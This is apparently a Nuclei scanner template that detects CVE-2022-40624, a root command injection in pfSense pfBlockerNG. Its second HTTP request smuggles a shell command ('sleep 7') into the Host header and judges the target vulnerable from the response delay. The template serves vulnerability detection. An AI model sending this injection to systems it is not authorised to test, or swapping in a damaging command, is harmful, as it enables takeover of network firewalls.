id: CVE-2022-40624

info:
  name: pfSense pfBlockerNG - OS Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header.
  impact: |
    Allows remote attackers to execute arbitrary code on the affected system
  remediation: |
    Update to the latest version of pfSense pfBlockerNG to mitigate CVE-2022-40624
  reference:
    - https://github.com/dhammon/pfBlockerNg-CVE-2022-40624
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40624
    cwe-id: CWE-78
    epss-score: 0.84655
    epss-percentile: 0.9935
    cpe: cpe:2.3:a:pfsense:pfblockerng:*:*:*:*:*:*:*:*
  metadata:
    vendor: pfsense
    product: pfblockerng
    shodan-query: "pfBlockerNG"
    fofa-query: "pfBlockerNG"
  tags: cve,cve2022,pfsense,pfblockerng,rce,sqli,netgate,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "GIF")'
          - 'contains(content_type, "image/gif")'
        condition: and
        internal: true

  - raw:
      - |+
        @timeout: 20s
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: {{Hostname}}' *; sleep 7; '

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - duration>=7
# digest: 4a0a00473045022077abd7f33cfad020623df9c7b128d8811cc4f6e1c1d5bca0a8f1639d18e58f3f022100aef5a78c882b0bed82fc58de5d3a65a618b01c2a4e9a1fad338f63f4919e699f:922c64590222798bb761d5b6d8e72950